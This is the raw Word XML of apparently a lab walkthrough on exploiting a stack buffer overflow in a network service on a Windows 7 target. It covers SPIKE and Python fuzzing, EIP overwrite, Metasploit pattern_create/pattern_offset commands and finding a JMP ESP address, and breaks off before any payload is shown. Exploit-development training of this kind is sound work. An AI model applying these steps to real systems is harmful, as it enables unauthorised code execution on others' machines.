          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4756B792" wp14:editId="0AA9E7BA">
            <wp:extent cx="5943600" cy="48298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29810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D8554" w14:textId="70A0DDE6" w:rsidR="006E1B90" w:rsidRDefault="006E1B90"/>
    <w:p w14:paraId="2721FD70" w14:textId="0285BF28" w:rsidR="00A268F6" w:rsidRDefault="00A268F6" w:rsidP="00A268F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc47350160"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Automatic Fuzzing on Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="666DC075" w14:textId="332B81DE" w:rsidR="006E1B90" w:rsidRDefault="006E1B90">
      <w:r>
        <w:t>On kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B89152" w14:textId="77777777" w:rsidR="00CD3AB0" w:rsidRDefault="00835CE5" w:rsidP="00CD3AB0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc47350161"/>
      <w:r>
        <w:t>Create spike script.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E739A" w14:textId="0B8CC6F0" w:rsidR="006E1B90" w:rsidRDefault="00835CE5">
      <w:r>
        <w:t>Need to tell it what value to attack s_string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50713850" w14:textId="0D572DD9" w:rsidR="00835CE5" w:rsidRDefault="00835CE5">
      <w:r>
        <w:t>Setup the variable to send to that value: s_string_variable(“0”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6486A29D" w14:textId="7D013FED" w:rsidR="0043673B" w:rsidRDefault="0043673B">
      <w:r>
        <w:t>&lt;note there is an error in code below for spk file.  Need closing parens for the “NICK “ line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B4595D" w14:textId="5C253B4C" w:rsidR="002A275E" w:rsidRDefault="00F22DB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B60B24C" wp14:editId="67A4BF5C">
            <wp:extent cx="4200525" cy="19240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0525" cy="1924050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E43A4D9" w14:textId="2CA993AB" w:rsidR="002A275E" w:rsidRDefault="00CD3AB0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0092CDB5" wp14:editId="34C1F7DA">
            <wp:extent cx="5943600" cy="23145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14575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47045FC0" w14:textId="1B78B831" w:rsidR="0076456B" w:rsidRDefault="00CD3AB0" w:rsidP="00CD3AB0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc47350162"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Check the debugger on the Win7 box</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="013EF1E4" w14:textId="6F36F19B" w:rsidR="00CD3AB0" w:rsidRDefault="00CD3AB0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CCE2464" wp14:editId="7BBBD067">
            <wp:extent cx="5943600" cy="20110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11045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4FAE45" w14:textId="7821CF08" w:rsidR="00CD3AB0" w:rsidRDefault="00CD3AB0">
      <w:r>
        <w:t xml:space="preserve">The program broke, but there are no “AAAA” values in EIP.  Lets try a different variable.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DFC09F" w14:textId="6F81D39C" w:rsidR="00CD3AB0" w:rsidRDefault="00CD3AB0">
      <w:r>
        <w:t>Restart the debugger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316A1A08" w14:textId="517FFCCB" w:rsidR="00CD3AB0" w:rsidRDefault="00CD3AB0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3611E990" wp14:editId="4700FA3D">
            <wp:extent cx="5943600" cy="255079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50795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6329F862" w14:textId="229D35B7" w:rsidR="00CD3AB0" w:rsidRDefault="00CD3AB0" w:rsidP="00CD3AB0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc47350163"/>
      <w:r>
        <w:t>Create a spike script for a different variable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="042281A1" w14:textId="289FF8DA" w:rsidR="00CD3AB0" w:rsidRDefault="00CD3AB0">
      <w:r>
        <w:t>NICK didn’t work.  Lets try class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A7999" w14:textId="1D556431" w:rsidR="00CD3AB0" w:rsidRDefault="00484A4C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DCA3917" wp14:editId="41FCE120">
            <wp:extent cx="3457575" cy="14001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7575" cy="1400175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF15DED" w14:textId="0138E4BC" w:rsidR="00484A4C" w:rsidRDefault="00484A4C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CAB0BAD" wp14:editId="270EE376">
            <wp:extent cx="5943600" cy="21761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76145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EABC2FB" w14:textId="0CA63337" w:rsidR="00484A4C" w:rsidRDefault="00484A4C">
      <w:r>
        <w:t>Check the debugger on Win 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F07887D" w14:textId="1625ADA5" w:rsidR="00484A4C" w:rsidRDefault="00484A4C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E8348F7" wp14:editId="5B0D20F3">
            <wp:extent cx="5943600" cy="37541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54120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="193C287D" w14:textId="77777777" w:rsidR="00484A4C" w:rsidRDefault="00484A4C"/>
    <w:p w14:paraId="4E9FFD43" w14:textId="77777777" w:rsidR="006A5FA5" w:rsidRDefault="006A5FA5"/>
    <w:p w14:paraId="74E26C89" w14:textId="77777777" w:rsidR="006A5FA5" w:rsidRDefault="006A5FA5"/>
    <w:p w14:paraId="71C51208" w14:textId="5B1612BC" w:rsidR="006A5FA5" w:rsidRDefault="006A5FA5"/>
    <w:p w14:paraId="78D99B5F" w14:textId="4F2A8CFD" w:rsidR="006A5FA5" w:rsidRDefault="006A5FA5"/>
    <w:p w14:paraId="2E6F9AF5" w14:textId="0A9862B4" w:rsidR="006A5FA5" w:rsidRDefault="006A5FA5"/>
    <w:p w14:paraId="130F41A0" w14:textId="4EFF4D9C" w:rsidR="006A5FA5" w:rsidRDefault="00C62A3B" w:rsidP="00F3770D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc47350164"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Manual fuzzing with python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="228622D6" w14:textId="05B59548" w:rsidR="006A5FA5" w:rsidRDefault="00C62A3B" w:rsidP="00285B7D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc47350165"/>
      <w:r>
        <w:t>Create a script to send data to the Class variable</w:t>
      </w:r>
      <w:r w:rsidR="00934963">
        <w:t xml:space="preserve"> with manual input</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1E0D63B1" w14:textId="77777777" w:rsidR="00285B7D" w:rsidRPr="00285B7D" w:rsidRDefault="00285B7D" w:rsidP="00285B7D"/>
    <w:p w14:paraId="02D2BF06" w14:textId="5A62B22C" w:rsidR="0076456B" w:rsidRDefault="00285B7D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="175A1755" wp14:editId="763DC715">
            <wp:extent cx="4714875" cy="30480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4875" cy="3048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCE460" w14:textId="3487E634" w:rsidR="006A5FA5" w:rsidRDefault="00285B7D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C9737D3" wp14:editId="304578D0">
            <wp:extent cx="5705475" cy="19526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5475" cy="1952625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A4E5F1" w14:textId="697B1FDE" w:rsidR="006A5FA5" w:rsidRDefault="00285B7D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="117A3F1B" wp14:editId="19D3B2B2">
            <wp:extent cx="4714875" cy="1076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875" cy="1076325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3382733F" w14:textId="350D5DC4" w:rsidR="00285B7D" w:rsidRDefault="00285B7D">
      <w:r>
        <w:t>Check Win7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD2EB43" w14:textId="702D66BA" w:rsidR="00285B7D" w:rsidRDefault="00285B7D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3559756A" wp14:editId="43FA30C2">
            <wp:extent cx="5619750" cy="3705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9750" cy="3705225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CAEF20" w14:textId="118C05AF" w:rsidR="00285B7D" w:rsidRDefault="00285B7D">
      <w:r>
        <w:t>EIP was eventually overwritten, but took some time.  There must be a better way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C2CC23" w14:textId="2AD92EE8" w:rsidR="00C46F2D" w:rsidRDefault="00C46F2D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58742186" wp14:editId="0043246E">
            <wp:extent cx="5943600" cy="255079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50795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67717AB5" w14:textId="077D5EB4" w:rsidR="00C46F2D" w:rsidRDefault="00C46F2D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="186A1A34" w14:textId="09136D6B" w:rsidR="003E5D3E" w:rsidRDefault="003E5D3E" w:rsidP="003E5D3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc47350166"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Create a script to send data to the Class variable with automatic input</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="47531E29" w14:textId="77777777" w:rsidR="00934963" w:rsidRDefault="00934963"/>
    <w:p w14:paraId="177F0CD1" w14:textId="74318F3A" w:rsidR="0076456B" w:rsidRDefault="00091E8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46ED2123" wp14:editId="1B82638B">
            <wp:extent cx="5943600" cy="37833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83330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C50AC11" w14:textId="52A8F03F" w:rsidR="00091E8D" w:rsidRDefault="00091E8D">
      <w:r>
        <w:t>Unfortunately, this doesn’t stop automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E54C3" w14:textId="6080266E" w:rsidR="0076456B" w:rsidRDefault="00091E8D" w:rsidP="00091E8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc47350167"/>
      <w:r>
        <w:t xml:space="preserve">Find the exact offset size using pattern_create in </w:t>
      </w:r>
      <w:r w:rsidR="00DC3E9A">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="3BEA0264" w14:textId="6753588B" w:rsidR="00DC3E9A" w:rsidRPr="00DC3E9A" w:rsidRDefault="00DC3E9A" w:rsidP="00DC3E9A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc47350168"/>
      <w:r>
        <w:t>Run the pattern_create script</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1938D225" w14:textId="245C268A" w:rsidR="0076456B" w:rsidRDefault="00091E8D">
      <w:r>
        <w:t xml:space="preserve">Run the following script on Kali: </w:t>
      </w:r>
      <w:r w:rsidRPr="00091E8D">
        <w:t>/usr/share/metasploit-framework/tools/exploit/pattern_create.rb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -l 10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F3872" w14:textId="74588A1E" w:rsidR="00091E8D" w:rsidRDefault="00091E8D">
      <w:r>
        <w:t>The ‘l’ option indicates the size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1AE49" w14:textId="30A3A0E6" w:rsidR="0076456B" w:rsidRDefault="00E85B84">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10606D5A" wp14:editId="3DE3173B">
            <wp:extent cx="5943600" cy="11137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13790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21124849" w14:textId="77777777" w:rsidR="00924685" w:rsidRDefault="00924685"/>
    <w:p w14:paraId="236C8816" w14:textId="77777777" w:rsidR="00924685" w:rsidRDefault="00924685"/>
    <w:p w14:paraId="3C0A8E5D" w14:textId="77777777" w:rsidR="00924685" w:rsidRDefault="00924685"/>
    <w:p w14:paraId="4FE382A4" w14:textId="77777777" w:rsidR="00924685" w:rsidRDefault="00924685"/>
    <w:p w14:paraId="4212E2E9" w14:textId="35B0ED64" w:rsidR="00525483" w:rsidRDefault="00A521E2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Copy that pattern into a script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FE4989" w14:textId="77777777" w:rsidR="00A521E2" w:rsidRDefault="00E85B84">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C559CF5" wp14:editId="3572FB28">
            <wp:extent cx="5943600" cy="20313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7F22D08A" w14:textId="0A3763DA" w:rsidR="00525483" w:rsidRDefault="00A521E2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A764976" wp14:editId="46ECEC70">
            <wp:extent cx="4610100" cy="12287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100" cy="1228725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14931615" w14:textId="5FD934F8" w:rsidR="005F186A" w:rsidRDefault="005F186A"/>
    <w:p w14:paraId="2AD1FE6A" w14:textId="37A09A05" w:rsidR="005F186A" w:rsidRDefault="005F186A" w:rsidP="00DC3E9A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc47350169"/>
      <w:r>
        <w:t>On win 7</w:t>
      </w:r>
      <w:r w:rsidR="00A521E2">
        <w:t xml:space="preserve"> check the registers for the value in EIP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6E18AB83" w14:textId="69995B11" w:rsidR="006273A7" w:rsidRDefault="006273A7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B478E44" wp14:editId="01FAF652">
            <wp:extent cx="5943600" cy="39490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49065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E36490C" w14:textId="45635EC3" w:rsidR="00924685" w:rsidRDefault="00924685" w:rsidP="00924685">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc47350170"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Run pattern_offset script to get exact offset</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="61B9D9E1" w14:textId="4509EDDD" w:rsidR="00924685" w:rsidRDefault="00924685" w:rsidP="00924685">
      <w:r>
        <w:t xml:space="preserve">Run the following command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00091E8D">
        <w:t>/usr/share/metasploit-framework/tools/exploit/pattern_</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00091E8D">
        <w:t>.rb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -l 10000 -q ‘6f43386f’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F7103A" w14:textId="2D833BB4" w:rsidR="00924685" w:rsidRDefault="00924685" w:rsidP="00924685">
      <w:r>
        <w:t xml:space="preserve">6f43386f was the value in EIP from the previous step.  Note, that this command references the pattern_create previously run.  These values may vary between pattern_create runs.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10373696" w14:textId="77777777" w:rsidR="00924685" w:rsidRPr="00924685" w:rsidRDefault="00924685" w:rsidP="00924685"/>
    <w:p w14:paraId="06364F5D" w14:textId="5F8FE44D" w:rsidR="006273A7" w:rsidRDefault="006273A7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0995E58E" wp14:editId="4759B5F1">
            <wp:extent cx="5943600" cy="6070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07060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0645A9B2" w14:textId="0C2A4B2E" w:rsidR="006273A7" w:rsidRDefault="006E2C9C">
      <w:r>
        <w:t>This tells use the exact number of bytes leading up to EIP.  Anything after that will overwrite EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92D6E3" w14:textId="154A9EA1" w:rsidR="006E2C9C" w:rsidRDefault="006E2C9C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB449FF" w14:textId="462351A4" w:rsidR="006E2C9C" w:rsidRDefault="006E2C9C" w:rsidP="006E2C9C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc47350171"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Locate a ‘JMP ESP’ instruction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="75ED80D6" w14:textId="478CC006" w:rsidR="009A0F9A" w:rsidRDefault="006E2C9C">
      <w:r>
        <w:t>On the Windows 7 machine, in the Immunity Debugger, select: View&gt; Executable Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFAFE1C" w14:textId="03DCE98D" w:rsidR="006E2C9C" w:rsidRDefault="006E2C9C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF8872F" wp14:editId="7567026B">
            <wp:extent cx="4257675" cy="44862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7675" cy="4486275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5773EC" w14:textId="3A3E4B44" w:rsidR="009A0F9A" w:rsidRDefault="0063041B">
      <w:r>
        <w:t>View “executable modules” in menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DA46D9" w14:textId="15B1801A" w:rsidR="0063041B" w:rsidRDefault="004B32F5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="558C19E5" wp14:editId="4BA1D28F">
            <wp:extent cx="4985573" cy="2688268"/>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8287" cy="2700515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B243127" w14:textId="45165E1B" w:rsidR="0063041B" w:rsidRDefault="004B32F5">
      <w:bookmarkStart w:id="16" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37C595DB" wp14:editId="389F1209">
            <wp:extent cx="5943600" cy="56991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699125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="5CC43ACF" w14:textId="73979EF4" w:rsidR="004B32F5" w:rsidRDefault="004B32F5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A15E637" wp14:editId="3D5EA974">
            <wp:extent cx="3821373" cy="2401369"/>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5243" cy="2498061"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC0615B" w14:textId="7D05050F" w:rsidR="0063041B" w:rsidRDefault="00300A44">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44A0039D" wp14:editId="4AC80685">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>522514</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>777059</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1258785" cy="1080654"/>
                <wp:effectExtent l="0" t="0" r="74930" b="62865"/>
                <wp:wrapNone/>
                <wp:docPr id="52" name="Straight Arrow Connector 52"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1258785" cy="10806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3B4A3EC" id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
                <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                <o:lock v:ext="edit" shapetype="t"/>
              </v:shapetype>
              <v:shape id="Straight Arrow Connector 52" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:41.15pt;margin-top:61.2pt;width:99.1pt;height:8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" strokecolor="red" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006273A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57CA53EE" wp14:editId="52B44362">
            <wp:extent cx="5943600" cy="11182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18235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC9DA51" w14:textId="2BAE0D31" w:rsidR="006273A7" w:rsidRDefault="006273A7">
      <w:r>
        <w:t>Put this address in the python script.  Note, hex characters</w:t>
      </w:r>
      <w:r w:rsidR="004B32F5">
        <w:t xml:space="preserve"> are preceded by the ‘\x’ prefix and</w:t>
